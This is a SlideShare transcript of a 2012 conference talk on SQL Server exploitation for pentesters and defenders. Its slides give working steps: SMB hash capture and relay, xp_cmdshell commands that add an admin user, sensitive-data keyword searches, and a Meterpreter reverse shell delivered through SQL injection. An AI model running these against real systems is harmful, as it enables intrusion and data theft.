SlideShare ist ein Scribd-Unternehmen logo

SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012

Scott Sutherland
Scott Sutherland

During this presentation attendees will be introduced to lesser known, yet significant vulnerabilities in SQL Server implementations related to common trust relationships, misconfigurations, and weak default settings. The issues that will be covered are often leveraged by attackers to gain unauthorized access to high value systems, applications, and sensitive data. An overview of each issue, common vectors of attack, and manual techniques will be covered. Finally newly created Metasploit modules and TSQL scripts will be demonstrated that help automate the attacks. This presentation will be valuable to penetration testers who are looking for faster ways to gain access to critical data and systems. Additionally, it should be worth while for developers and database administrators who are interested in gaining a better understanding of how to protect their applications and databases from these attacks. More security blogs by the authors can be found @ https://www.netspi.com/blog/

Technologie
1 von 76
Downloaden Sie, um offline zu lesen
SQL Server Exploitation, Escalation, and Pilfering AppSec USA 2012 Authors: Antti Rantasaari Scott Sutherland
Who are we? Antti Rantasaari Scott Sutherland (@_nullbind) What we do… • Security consultants at NetSPI • Pentesters ‒ Network ‒ Web ‒ Thick • Researchers, bloggers, etc • Pinball enthusiasts
What are we going to cover? 1. Database entry points 2. Domain user  Database user 3. Database user  OS admin 4. OS admin  Database admin 5. Database admin  OS admin 6. Finding sensitive data 7. Escalation: Service accounts 8. Escalation: Database Link Crawling 9. Conclusions
Why target SQL Servers? Pentest Goal = Data Access • It’s deployed everywhere • Very few “exploits”, but it’s commonly misconfigured • Integrated with Windows and Active Directory authentication • Easy and stable to exploit
Why develop Metasploit tools? • I suck at programming • Easy to use framework • Huge community support • Easy management of code (GitHub) • Easy distribution of code http://www.metasploit.com/ https://github.com/rapid7/metasploit-framework
Let’s get started!
Entry Points: Summary asef Unauthenticated Options • SQL injections • Weak passwords Authenticated Options (usually) • Other database servers • Unencrypted connection strings: ‒ Files ‒ Registry ‒ Network • ODBC connections • Client tools (priv inheritance)
DOMAIN user  DATABASE user Privilege Inheritance
Privilege Inheritance: Summary The “Domains Users” group is often provided privileges to login into SQL Servers… Evil users just need to: • Find SQL Servers • Verify Access • Attack!
Privilege Inheritance: Find SQL Servers Easy SQL Server Discovery = SQLPing v3.0 http://www.sqlsecurity.com/dotnetnuke/uploads/sqlping3.zip
Privilege Inheritance: Find SQL Servers Finding SQL Servers with osql:
Privilege Inheritance: Verify Access Test current user’s access to SQL Servers with osql: FOR /F “tokens=*” %i in (‘type sqlservers.txt’) do osql –E –S %i –Q “select ‘I have access to:’+@@servername”
Privilege Inheritance: Verify Access Test alternative user’s access to the SQL Servers with the MSSQL_SQL Metasploit module: msfconsole use auxiliary/admin/mssql/mssql_sql set RHOST <IP RANGE> set RPORT <port> set USE_WINDOWS_AUTHENT true set DOMAIN <domain> set USERNAME <user> set PASSWORD <password> Set SQL <query> run http://www.metasploit.com/modules/auxiliary/admin/mssql/mssql_sql
Privilege Inheritance: Verify Access asef
Privilege Inheritance: Verify Access asef
DATABASE USER  OS ADMIN SMB Capture/Relay
SMB Capture/Relay: Summary SQL Server supports functions that can access files via UNC paths using the privileges of the SQL Server service account. High level authentication process:
SMB Capture/Relay: Summary Stored procedures with UNC support: ‒ *xp_dirtree ‒ *xp_fileexist ‒ xp_getfiledetails Possible SMB authentication attacks: Service Account Network Communication SMB Capture SMB Relay LocalSystem Computer Account Yes No NetworkService Computer Account Yes No *Local Administrator Local Administrator Yes Yes *Domain User Domain User Yes Yes *Domain Admin Domain Admin Yes Yes http://erpscan.com/press-center/smbrelay-bible-2-smbrelay-by-ms-sql-server/ http://www.netspi.com/blog/2010/07/01/invisible-threats-insecure-service-accounts/
SMB Capture: Diagram
SMB Capture: Start Sniffing for Hashes Start Metasploit SMB capture module on your evil server to capture seeded password hashes: msfconsole use auxiliary/server/capture/smb set CAINPWFILE /root/cain_hashes.txt set JOHNPWFILE /root/john_hashes.txt exploit http://www.metasploit.com/modules/auxiliary/server/capture/smb http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
SMB Capture: Force MS SQL to Auth Force SQL Server to authenticate with the modules: MSSQL_NTLM_STEALER or MSSQL_NTLM_STEALER_SQLI msfconsole use auxiliary/admin/mssql/mssql_ntlm_stealer set USE_WINDOWS_AUTHENT true set DOMAIN <domain> set USERNAME <user> set PASSWORD <password> set RHOSTS <IP RANGE> set RPORT <port> Set SMBPROXY <evil server> run
SMB Capture: Obtain Seeded Hashes Obtaining service account hashes from the SQL Server should look something like this: DOMAIN: DEMO USER: serviceaccount LMHASH:5e17a06b538a42ae82273227fd61a5952f85252cc731bb25 NTHASH:763aa16c6882cb1b99d40dfc337b69e7e424d6524a91c03e http://www.metasploit.com/modules/auxiliary/server/capture/smb http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
SMB Capture: Crack Hashes 1. Crack first half of recovered LANMAN hash with seeded half LM Rainbow Tables: rcracki_mt -h 5e17a06b538a42ae ./halflmchall 2. Crack the second half with john the ripper to obtain case sensitive NTLM password. perl netntlm.pl --seed GPP4H1 --file /root/john_hashes.txt http://www.metasploit.com/modules/auxiliary/server/capture/smb http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
SMB Relay: Diagram Very high level overview: http://en.wikipedia.org/wiki/SMBRelay
SMB Relay: Setup SMBProxy for Relay SMB Relay to 3rd Party with the SMB_Relay Metasploit exploit module: msfconsole use exploit/windows/smb/smb_relay set SMBHOST <targetserver> exploit If the service account has the local admin privileges on the remote system, then a shell will be returned by the smb_relay module http://www.metasploit.com/modules/exploit/windows/smb/smb_relay
SMB Relay: Force MS SQL to Auth Force SQL Server to authenticate with the modules MSSQL_NTLM_STEALER or MSSQL_NTLM_STEALER_SQLI Msfconsole use auxiliary/admin/mssql/mssql_ntlm_stealer set USE_WINDOWS_AUTHENT true set DOMAIN <domain> set USERNAME <user> set PASSWORD <password> set RHOSTS <IP RANGE> set RPORT <port> Set SMBPROXY <evil server> run
SMB Relay: Get Meterpreter Shells
SMB Capture/Relay: Using PW or Shell If meterpreter then: • Type: shell • Type: osql –E –Q “what ever you want” If password: • Sign in via RDP • Open a cmd console • osql –E –Q “what ever you want”
DEMO
Do a crazy dance! BALLET = NOT CRAZY DANCING FLY = TOTALLY CRAZY
OS ADMIN  DATABASE ADMIN SQL Server Local Authorization Bypass
Local Auth Bypass: Summary How can we go from OS admin to DB admin? • SQL Server 2000 to 2008 ‒ LocalSystem = Sysadmin privileges • SQL Server 2012 ‒ Must migrate to SQL Server service process for Sysadmin privileges
Local Auth Bypass: Summary Transparent Encryption = Mostly Useless (unless local hard drive encryption is in place and key management is done correctly)
Local Auth Bypass: Psexec On SQL Server 2000 to 2008 Execute queries as sysadmin with osql: psexec –s cmd.exe osql –E –S “localhostsqlexpress” –Q “select is_srvrolemember(‘sysadmin’)” Execute queries as sysadmin with SSMS: psexec –i –s ssms http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
Local Auth Bypass: Get Shell Obtain Meterpreter shell using the PSEXEC module msfconsole use exploit/windows/smb/psexec set RHOST <targetserver> set SMBDOMAIN . set SMBUSER <user> set SMBPASS <password> exploit http://www.metasploit.com/modules/exploit/windows/smb/psexec
Local Auth Bypass: Get Sysadmin Create sysadmin in database using the Metasploit mssql_local_auth_bypass post module: In Meterpeter type “background” to return to msconsole. Then, in the msfconsole type: use post/windows/manage/mssql_local_auth_bypass set session <session> set DB_USERNAME <username> set DB_PASSWORD <password> exploit http://www.metasploit.com/modules/post/windows/manage/mssql_local_auth_bypass
SQL Server Auth Bypass: Got Sysadmin asef
Do a crazy whale dance! To the left… To the right… Now dive!
DATABASE ADMIN  OS ADMIN xp_cmdshell
XP_CMDSHELL: Summary XP_CMDSHELL = OS COMMAND EXEC Yes. We know you already know this, but don’t forget…
XP_CMDSHELL: Re-Install Re-install xp_cmdshell EXEC master..sp_addextendedproc "xp_cmdshell", "C:Program FilesMicrosoft SQL ServerMSSQLBinnxplog70.dll";
XP_CMDSHELL: Re-Enable Re-enable xp_cmdshell sp_configure ‘show advanced options’, 1; reconfigure; go; sp_configure ‘xp_cmdshell’, 1; reconfigure; go;
XP_CMDSHELL: Execute Commands Add Local OS Administrator with xp_cmdshell EXEC master..xp_cmdshell ‘net user myadmin MyP@sword1’ EXEC master..xp_cmdshell ‘net localgroup administrators /add myadmin’
FINDING DATA
Finding Data: Summary GOAL = Find sensitive data! • Credit cards • Social security number • Medical records
Finding Data: TSQL Script Simple keywords search via TSQL! EXEC master..sp_msforeachdb 'SELECT @@Servername as Server_Name,''[?]'' as Database_name,Table_Name,Column_Name FROM [?].INFORMATION_SCHEMA.COLUMNS WHERE Column_Name LIKE ''%password%'' OR Column_Name LIKE ''%Credit%'' OR Column_Name LIKE ''%CCN%'' OR Column_Name LIKE ''%Account%'' OR Column_Name LIKE ''%Social%'' OR Column_Name LIKE ''%SSN%'' ORDER BY Table_name'
Finding Data: Metasploit Module Database scraping with the mssql_findandsampledata module! Features • Scan multiple servers • Authenticate with local Windows, Domain or SQL credentials • Sample data • Number of records found • Output to screen and CSV file http://www.metasploit.com/modules/auxiliary/admin/mssql/mssql_findandsampledata
Finding Data: Metasploit Module Launching mssql_findandsampledata: msfconsole use auxiliary/admin/mssql/mssql_findandsampledata set RHOSTS <range> set RPORT <port> setg USE_WINDOWS_AUTHENT true setg DOMAIN <CompanyDomain> set USERNAME <username> set PASSWORD <password> set SAMPLE_SIZE <size> set KEYWORDS credit|social|password exploit
Finding Data: Module Output asef
Finding Data: Demo DEMO
Do a crazy cat disco dance!
Escalation: Service Accounts
Shared Service Accounts: Summary XP_CMDSHELL + Shared Service Accounts + OSQL -E = (more) Unauthorized DATA access
Shared Service Accounts: Diagram asef
Shared Service Accounts: TSQL Script XP_CMDSHELL + OSQL = MORE ACCESS! EXEC master..xp_cmdshell ‘osql –E –S HVA –Q “select super.secret.data”’ More examples: http://www.netspi.com/blog/2011/07/19/when-databases-attack-hacking- with-the-osql-utility/
Escalation: Database Link Crawling
Database Link Crawling: Summary Database Links • Allow one database server to query another • Often configured with excessive privileges • Can be chained together • Use openquery() to query linked servers • Can be used to execute the infamous xp_cmdshell • Tons of access, no credentials required (via SQL injection)
Database Link Crawling: Diagram asef
Database Link Crawling: List Links How do I list linked servers? Two common options: sp_linkedservers and SELECT srvname FROM master..sysservers
Database Link Crawling: List Links How do I list linked servers on a linked server? SELECT srvname FROM openquery(DB1, 'select srvname FROM master..sysservers')
Database Link Crawling: List Links How do I list linked servers on the linked server’s linked server? SELECT srvname FROM openquery(DB1,'SELECT srvname FROM openquery(HVA,''SELECT srvname FROM master..sysservers'')')
Database Link Crawling: You Get it! ….You get the point You can follow links until you run out 
Database Link Crawling: Exec Cmds How do I run commands on a linked server? SELECT * FROM openquery(DB1,’SELECT * FROM openquery(HVA,’’SELECT 1;exec xp_cmdshell ‘’’’ping 192.168.1.1’’’’ ‘’)’)
Database Link Crawling: Modules Two Modules 1. Direct connection 2. SQL Injection Available for Download • Not submitted to Metasploit trunk – Yet • Downloads available from nullbind’s github ‒ mssql_linkcrawler.rb ‒ mssql_linkcrawler_sqli.rb
Database Link Crawling: Modules • Features ‒ Crawl SQL Server database links ‒ Standard Crawl output ‒ Verbose Crawl output ‒ Output to CSV file ‒ Supports 32 and 64 bit Windows ‒ Global Metasploit payload deployment ‒ Targeted Metasploit payload deployment ‒ Payload deployment via powershell memory injection
Metasploit Module: Run multi/handler Setup the multi/handler module: use multi/handler set payload windows/meterpreter/reverse_tcp set lhost 0.0.0.0 set lport 443 set ExitOnSession false exploit -j -z
Metasploit Module: Link Crawler Setup the mssql_linkcrawler_sqli module: use exploit/windows/mssql/mssql_linkcrawler_sqli set GET_PATH /employee.asp?id=1;[SQLi];-- set type blind set RHOST 192.168.1.100 set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.130 set lport 443 set DisablePayloadHandler true exploit
Database Link Crawling: Attack! asef
Database Link Chaining: Demo DEMO
Do a crazy cat disco dance! Yes. It warrants 2 disco cats!
Database Link Chaining: Modules Current Constraints • Cannot crawl through SQL Server 2000 • Cannot enable xp_cmdshell through links • Cannot deliver payloads to systems without powershell (at the moment) • Currently, the module leaves a powershell process running on exit • Currently, doesn’t allow arbitrary query execution on linked servers
Conclusions configure all accounts with LEAST PRIVILEGE system accounts service accounts database accounts application accounts
Conclusions always VALIDATE INPUT web apps thick apps mobile apps web services
Conclusions Configure SMB SIGNING
Conclusions don’t do DRUGS
Questions Antti Rantasaari Email: antti.rantasaari@netspi.com Scott Sutherland Email: scott.sutherland@netspi.com Blog: http://www.netspi.com/blog/author/ssutherland/ Github: http://www.github.com/nullbind/ Twitter: @_nullbind Presentation Slides http://www.slideshare.net/nullbind/sql-serverexploitationescalationandpilferingapp- secusa2012

Empfohlen

STORED XSS IN DVWA
STORED XSS IN DVWASTORED XSS IN DVWA
STORED XSS IN DVWARutvik patel
 
SQL Injection
SQL Injection SQL Injection
SQL Injection Adhoura Academy
 
Attribute-Based Access Control in Symfony
Attribute-Based Access Control in SymfonyAttribute-Based Access Control in Symfony
Attribute-Based Access Control in SymfonyAdam Elsodaney
 
Basic Malware Analysis
Basic Malware AnalysisBasic Malware Analysis
Basic Malware AnalysisAlbert Hui
 
Zero-Knowledge Proofs: Identity Proofing and Authentication
Zero-Knowledge Proofs: Identity Proofing and AuthenticationZero-Knowledge Proofs: Identity Proofing and Authentication
Zero-Knowledge Proofs: Identity Proofing and AuthenticationClare Nelson, CISSP, CIPP-E
 
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShell2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShellScott Sutherland
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injectionamiable_indian
 
Password Cracking
Password Cracking Password Cracking
Password Cracking Sina Manavi
 

Empfohlen

STORED XSS IN DVWA
STORED XSS IN DVWASTORED XSS IN DVWA
STORED XSS IN DVWARutvik patel
 
SQL Injection
SQL Injection SQL Injection
SQL Injection Adhoura Academy
 
Attribute-Based Access Control in Symfony
Attribute-Based Access Control in SymfonyAttribute-Based Access Control in Symfony
Attribute-Based Access Control in SymfonyAdam Elsodaney
 
Basic Malware Analysis
Basic Malware AnalysisBasic Malware Analysis
Basic Malware AnalysisAlbert Hui
 
Zero-Knowledge Proofs: Identity Proofing and Authentication
Zero-Knowledge Proofs: Identity Proofing and AuthenticationZero-Knowledge Proofs: Identity Proofing and Authentication
Zero-Knowledge Proofs: Identity Proofing and AuthenticationClare Nelson, CISSP, CIPP-E
 
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShell2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShellScott Sutherland
 
Advanced SQL Injection
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injectionamiable_indian
 
Password Cracking
Password Cracking Password Cracking
Password Cracking Sina Manavi
 
The Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryWill Schroeder
 
Optimizing Cypher Queries in Neo4j
Optimizing Cypher Queries in Neo4jOptimizing Cypher Queries in Neo4j
Optimizing Cypher Queries in Neo4jNeo4j
 
Database Systems Security
Database Systems SecurityDatabase Systems Security
Database Systems Securityamiable_indian
 
Intro ProxySQL
Intro ProxySQLIntro ProxySQL
Intro ProxySQLI Goo Lee
 
Authentication vs authorization
Authentication vs authorizationAuthentication vs authorization
Authentication vs authorizationFrank Victory
 
Evading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationEvading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationNikhil Mittal
 
Beyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL ServerBeyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL ServerScott Sutherland
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 
CodeQL a Powerful Binary Analysis Engine
CodeQL a Powerful Binary Analysis EngineCodeQL a Powerful Binary Analysis Engine
CodeQL a Powerful Binary Analysis EngineMaryEliot
 
SQL Injection
SQL InjectionSQL Injection
SQL InjectionAsish Kumar Rath
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxDARSHANBHAVSAR14
 
Detecting WMI Exploitation v1.1
Detecting WMI Exploitation v1.1Detecting WMI Exploitation v1.1
Detecting WMI Exploitation v1.1Michael Gough
 
XML & XPath Injections
XML & XPath InjectionsXML & XPath Injections
XML & XPath InjectionsAMol NAik
 
Auditing and Monitoring PostgreSQL/EPAS
Auditing and Monitoring PostgreSQL/EPASAuditing and Monitoring PostgreSQL/EPAS
Auditing and Monitoring PostgreSQL/EPASEDB
 
Logging with Elasticsearch, Logstash & Kibana
Logging with Elasticsearch, Logstash & KibanaLogging with Elasticsearch, Logstash & Kibana
Logging with Elasticsearch, Logstash & KibanaAmazee Labs
 
MySQL Security
MySQL SecurityMySQL Security
MySQL SecurityTed Wennmark
 
01.windows 보안(접근제어모델 리뷰) 2016.05.25
01.windows 보안(접근제어모델 리뷰) 2016.05.2501.windows 보안(접근제어모델 리뷰) 2016.05.25
01.windows 보안(접근제어모델 리뷰) 2016.05.25InGuen Hwang
 
Social Engineering Audit & Security Awareness
Social Engineering Audit & Security AwarenessSocial Engineering Audit & Security Awareness
Social Engineering Audit & Security AwarenessCBIZ, Inc.
 
Sandbox Atlatma Teknikleri ve Öneriler
Sandbox Atlatma Teknikleri ve ÖnerilerSandbox Atlatma Teknikleri ve Öneriler
Sandbox Atlatma Teknikleri ve ÖnerilerBGA Cyber Security
 
Pen Testing Explained
Pen Testing ExplainedPen Testing Explained
Pen Testing ExplainedRand W. Hirt
 
DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShellDerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShellScott Sutherland
 
WTF is Penetration Testing
WTF is Penetration TestingWTF is Penetration Testing
WTF is Penetration TestingScott Sutherland
 

Weitere ähnliche Inhalte

Was ist angesagt?

The Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryWill Schroeder
 
Optimizing Cypher Queries in Neo4j
Optimizing Cypher Queries in Neo4jOptimizing Cypher Queries in Neo4j
Optimizing Cypher Queries in Neo4jNeo4j
 
Database Systems Security
Database Systems SecurityDatabase Systems Security
Database Systems Securityamiable_indian
 
Intro ProxySQL
Intro ProxySQLIntro ProxySQL
Intro ProxySQLI Goo Lee
 
Authentication vs authorization
Authentication vs authorizationAuthentication vs authorization
Authentication vs authorizationFrank Victory
 
Evading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationEvading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationNikhil Mittal
 
Beyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL ServerBeyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL ServerScott Sutherland
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 
CodeQL a Powerful Binary Analysis Engine
CodeQL a Powerful Binary Analysis EngineCodeQL a Powerful Binary Analysis Engine
CodeQL a Powerful Binary Analysis EngineMaryEliot
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxDARSHANBHAVSAR14
 
Detecting WMI Exploitation v1.1
Detecting WMI Exploitation v1.1Detecting WMI Exploitation v1.1
Detecting WMI Exploitation v1.1Michael Gough
 
XML & XPath Injections
XML & XPath InjectionsXML & XPath Injections
XML & XPath InjectionsAMol NAik
 
Auditing and Monitoring PostgreSQL/EPAS
Auditing and Monitoring PostgreSQL/EPASAuditing and Monitoring PostgreSQL/EPAS
Auditing and Monitoring PostgreSQL/EPASEDB
 
Logging with Elasticsearch, Logstash & Kibana
Logging with Elasticsearch, Logstash & KibanaLogging with Elasticsearch, Logstash & Kibana
Logging with Elasticsearch, Logstash & KibanaAmazee Labs
 
01.windows 보안(접근제어모델 리뷰) 2016.05.25
01.windows 보안(접근제어모델 리뷰) 2016.05.2501.windows 보안(접근제어모델 리뷰) 2016.05.25
01.windows 보안(접근제어모델 리뷰) 2016.05.25InGuen Hwang
 
Social Engineering Audit & Security Awareness
Social Engineering Audit & Security AwarenessSocial Engineering Audit & Security Awareness
Social Engineering Audit & Security AwarenessCBIZ, Inc.
 
Sandbox Atlatma Teknikleri ve Öneriler
Sandbox Atlatma Teknikleri ve ÖnerilerSandbox Atlatma Teknikleri ve Öneriler
Sandbox Atlatma Teknikleri ve ÖnerilerBGA Cyber Security
 
Pen Testing Explained
Pen Testing ExplainedPen Testing Explained
Pen Testing ExplainedRand W. Hirt
 

Was ist angesagt? (20)

The Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active Directory
 
Optimizing Cypher Queries in Neo4j
Optimizing Cypher Queries in Neo4jOptimizing Cypher Queries in Neo4j
Optimizing Cypher Queries in Neo4j
 
Database Systems Security
Database Systems SecurityDatabase Systems Security
Database Systems Security
 
Intro ProxySQL
Intro ProxySQLIntro ProxySQL
Intro ProxySQL
 
Authentication vs authorization
Authentication vs authorizationAuthentication vs authorization
Authentication vs authorization
 
Evading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationEvading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory Domination
 
Beyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL ServerBeyond xp_cmdshell: Owning the Empire through SQL Server
Beyond xp_cmdshell: Owning the Empire through SQL Server
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injection
 
CodeQL a Powerful Binary Analysis Engine
CodeQL a Powerful Binary Analysis EngineCodeQL a Powerful Binary Analysis Engine
CodeQL a Powerful Binary Analysis Engine
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptx
 
Detecting WMI Exploitation v1.1
Detecting WMI Exploitation v1.1Detecting WMI Exploitation v1.1
Detecting WMI Exploitation v1.1
 
XML & XPath Injections
XML & XPath InjectionsXML & XPath Injections
XML & XPath Injections
 
Auditing and Monitoring PostgreSQL/EPAS
Auditing and Monitoring PostgreSQL/EPASAuditing and Monitoring PostgreSQL/EPAS
Auditing and Monitoring PostgreSQL/EPAS
 
Logging with Elasticsearch, Logstash & Kibana
Logging with Elasticsearch, Logstash & KibanaLogging with Elasticsearch, Logstash & Kibana
Logging with Elasticsearch, Logstash & Kibana
 
MySQL Security
MySQL SecurityMySQL Security
MySQL Security
 
01.windows 보안(접근제어모델 리뷰) 2016.05.25
01.windows 보안(접근제어모델 리뷰) 2016.05.2501.windows 보안(접근제어모델 리뷰) 2016.05.25
01.windows 보안(접근제어모델 리뷰) 2016.05.25
 
Social Engineering Audit & Security Awareness
Social Engineering Audit & Security AwarenessSocial Engineering Audit & Security Awareness
Social Engineering Audit & Security Awareness
 
Sandbox Atlatma Teknikleri ve Öneriler
Sandbox Atlatma Teknikleri ve ÖnerilerSandbox Atlatma Teknikleri ve Öneriler
Sandbox Atlatma Teknikleri ve Öneriler
 
Pen Testing Explained
Pen Testing ExplainedPen Testing Explained
Pen Testing Explained
 

Andere mochten auch

DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShellDerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShellScott Sutherland
 
WTF is Penetration Testing
WTF is Penetration TestingWTF is Penetration Testing
WTF is Penetration TestingScott Sutherland
 
Secure360 - Extracting Password from Windows
Secure360 - Extracting Password from WindowsSecure360 - Extracting Password from Windows
Secure360 - Extracting Password from WindowsScott Sutherland
 
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)Scott Sutherland
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack webhostingguy
 
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial EmulationScott Sutherland
 

Andere mochten auch (6)

DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShellDerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
 
WTF is Penetration Testing
WTF is Penetration TestingWTF is Penetration Testing
WTF is Penetration Testing
 
Secure360 - Extracting Password from Windows
Secure360 - Extracting Password from WindowsSecure360 - Extracting Password from Windows
Secure360 - Extracting Password from Windows
 
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack
 
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
 

Ähnlich wie SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012

TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsTROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsScott Sutherland
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new blackRob Fuller
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new blackChris Gates
 
Architecting cloud
Architecting cloudArchitecting cloud
Architecting cloudTahsin Hasan
 
TrinityCore server install guide
TrinityCore server install guideTrinityCore server install guide
TrinityCore server install guideSeungmin Shin
 
Drupal, Memcache and Solr on Windows
Drupal, Memcache and Solr on WindowsDrupal, Memcache and Solr on Windows
Drupal, Memcache and Solr on WindowsAlessandro Pilotti
 
Caching and tuning fun for high scalability
Caching and tuning fun for high scalabilityCaching and tuning fun for high scalability
Caching and tuning fun for high scalabilityWim Godden
 
Security features In MySQL 8.0
Security features In MySQL 8.0Security features In MySQL 8.0
Security features In MySQL 8.0Mydbops
 
2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQLScott Sutherland
 
Whitepaper MS SQL Server on Linux
Whitepaper MS SQL Server on LinuxWhitepaper MS SQL Server on Linux
Whitepaper MS SQL Server on LinuxRoger Eisentrager
 
Caching and tuning fun for high scalability
Caching and tuning fun for high scalabilityCaching and tuning fun for high scalability
Caching and tuning fun for high scalabilityWim Godden
 
Low Hanging Fruit, Making Your Basic MongoDB Installation More Secure
Low Hanging Fruit, Making Your Basic MongoDB Installation More SecureLow Hanging Fruit, Making Your Basic MongoDB Installation More Secure
Low Hanging Fruit, Making Your Basic MongoDB Installation More SecureMongoDB
 
MySQL database replication
MySQL database replicationMySQL database replication
MySQL database replicationPoguttuezhiniVP
 
Writing & Sharing Great Modules - Puppet Camp Boston
Writing & Sharing Great Modules - Puppet Camp BostonWriting & Sharing Great Modules - Puppet Camp Boston
Writing & Sharing Great Modules - Puppet Camp BostonPuppet
 
MySQL 101 PHPTek 2017
MySQL 101 PHPTek 2017MySQL 101 PHPTek 2017
MySQL 101 PHPTek 2017Dave Stokes
 
Aeon mike guide transparent ssl filtering (1)
Aeon mike guide transparent ssl filtering (1)Aeon mike guide transparent ssl filtering (1)
Aeon mike guide transparent ssl filtering (1)Conrad Cruz
 
Aeon mike guide transparent ssl filtering
Aeon mike guide transparent ssl filteringAeon mike guide transparent ssl filtering
Aeon mike guide transparent ssl filteringConrad Cruz
 

Ähnlich wie SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012 (20)

TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsTROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new black
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
 
Architecting cloud
Architecting cloudArchitecting cloud
